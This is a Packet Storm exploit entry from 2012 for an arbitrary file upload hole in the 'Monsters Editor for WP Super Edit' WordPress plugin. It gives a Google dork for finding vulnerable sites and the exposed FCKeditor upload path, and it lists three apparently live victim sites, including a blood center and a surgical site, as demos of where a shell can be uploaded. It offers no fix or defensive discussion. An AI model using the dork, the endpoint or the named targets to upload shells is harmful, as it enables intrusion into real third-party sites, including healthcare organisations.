WordPress Monsters Editor Shell Upload

2012-08-22T00:00:00
ID PACKETSTORM:115788
Type packetstorm
Reporter Crim3R
Modified 2012-08-22T00:00:00

Description

                                        
                                            `# Exploit Title: Wordpress Monsters Editor for WP Super Edit Arbitrary File   
Upload Vulnerability  
  
# Google Dork: inurl:wp-content/plugins/monsters-editor-10-for-wp-super-edit/  
  
# Date: 08/22/2012  
  
# Author: Crim3R  
  
# download Link :   
http://downloads.wordpress.org/plugin/monsters-editor-10-for-wp-super-edit.zip  
  
# Tested on: all  
  
==================================  
  
D3m0:  
http://celiaflores.net/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html  
  
  
http://kybloodcenter.org/hospital/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html  
  
  
http://surgical.healthase.com/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html  
  
  
===============Crim3R@Att.Net=========  
$Home = %00  
thanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir   
  
`